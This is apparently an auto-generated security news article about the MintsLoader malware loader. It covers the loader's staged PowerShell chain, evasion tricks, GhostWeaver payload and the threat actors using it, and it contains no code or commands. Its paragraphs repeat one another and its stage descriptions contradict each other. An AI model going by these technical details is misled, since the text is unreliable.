Ethical Hacking News
MintsLoader is a sophisticated malware loader that delivers advanced persistent threats via a multi-stage chain involving obfuscated JavaScript and PowerShell scripts. The malware has been observed delivering various follow-on payloads, including the GhostWeaver RAT, through fake invoice files and phishing campaigns. Experts have identified several threat actors utilizing MintsLoader in their campaigns, highlighting the need for enhanced security measures against this evolving threat.
MintsLoader is a sophisticated malware loader that delivers advanced persistent threats via a multi-stage chain involving obfuscated JavaScript and PowerShell scripts. The malware uses fake invoice files to deliver MintsLoader payloads, primarily targeting industrial and professional sectors in North America and Europe. MintsLoader has three stages: the first stage downloads the second stage from a remote server, the second stage downloads the third stage via an HTTP GET request, and the third stage generates a unique key for communication with a C2 server. Threat actors use MintsLoader in their campaigns, including TAG-124, which uses phishing messages, fake browser updates, and invoice lures to deliver the malware. The evolution of MintsLoader highlights the shift from anonymous VPS providers to traditional bulletproof hosters, aiming to harden infrastructure against takedown attempts.
MintsLoader, a sophisticated malware loader, has been identified as a significant threat by security researchers. The malware has been observed delivering various follow-on payloads, including the GhostWeaver RAT, through an intricate multi-stage chain involving obfuscated JavaScript and PowerShell scripts. This article provides an in-depth analysis of MintsLoader's attack mechanisms, its evolution over time, and the tactics used by threat actors to evade detection.
The use of fake invoice files (e.g., "Fattura####.js") is a notable tactic employed by MintsLoader attackers to deliver MintsLoader payloads. This approach has been observed primarily in industrial and professional sectors in North America and Europe. The malware's first stage involves the execution of a PowerShell command that downloads the second stage from a remote server, utilizing evasion techniques like junk code and disguised commands to bypass detection.
The third stage of MintsLoader, however, is more sophisticated. This stage downloads a PowerShell script from a command-and-control (C2) server via an HTTP GET request. The script contains a Base64-encoded payload that is XOR-decoded and decompressed to reveal heavily obfuscated code. The script disables AMSI protections and runs multiple system checks, such as VM detection, DAC type, and cache memory purpose, to generate a unique key sent to the C2.
Based on the system's characteristics and campaign ID, the script constructs a dynamic domain using a simple domain generation algorithm (DGA) to fetch stage three. If the target passes the checks, the loader downloads advanced malware like GhostWeaver, a PowerShell-based RAT with TLS-encrypted C2 communication and capabilities to redeploy MintsLoader. Conversely, if the system fails validation, the C2 may deliver a decoy executable like AsyncRAT.
Experts have observed several threat actors utilizing MintsLoader in their campaigns. Notably, TAG-124 has been linked to this malware loader. The attack chain commences via phishing messages, fake browser updates, and invoice lures through Italy's PEC email system. In early 2025, Recorded Future researchers observed a phishing campaign targeting the U.S. and European energy, oil, gas, and legal sectors; attackers attempted to deliver MintsLoader via malicious JavaScript or fake verification pages.
The evolution of MintsLoader highlights the shift in tactics by threat actors from anonymous virtual private server (VPS) providers to more traditional bulletproof hosters like SCALAXY-AS and Stark Industries. This move likely aims to harden their infrastructure against takedown attempts and enhance operational stability.
Recorded Future researchers have shared up-to-date C2 domains and other artifacts related to recent MintsLoader attacks, providing valuable insights into the malware's attack mechanisms and tactics used by threat actors. These findings underscore the importance of staying vigilant and proactive in detecting emerging threats like MintsLoader.
MintsLoader is a sophisticated malware loader that delivers advanced persistent threats via a multi-stage chain involving obfuscated JavaScript and PowerShell scripts. The malware has been observed delivering various follow-on payloads, including the GhostWeaver RAT, through fake invoice files and phishing campaigns. Experts have identified several threat actors utilizing MintsLoader in their campaigns, highlighting the need for enhanced security measures against this evolving threat.
Related Information:
https://www.ethicalhackingnews.com/articles/MintsLoader-A-Malicious-Malware-Loader-Delivers-Advanced-Persistent-Threats-via-Multi-Stage-Chain-ehn.shtml
https://securityaffairs.com/177448/malware/experts-shared-up-to-date-c2-domains-and-other-artifacts-related-to-recent-mintsloader-attacks.html
https://fidelissecurity.com/threatgeek/threat-detection-response/c2-command-and-control-detection/
https://cybermaterial.com/asyncrat-trojan-malware/
https://thesecmaster.com/blog/asyncrat
https://thehackernews.com/2025/01/mintsloader-delivers-stealc-malware-and.html
https://thehackernews.com/2025/05/mintsloader-drops-ghostweaver-via.html
https://cybersecuritynews.com/apt-attack/
https://www.socinvestigation.com/comprehensive-list-of-apt-threat-groups-motives-and-attack-methods/
Published: Mon May 5 07:42:42 2025 by llama3.2 3B Q4_K_M
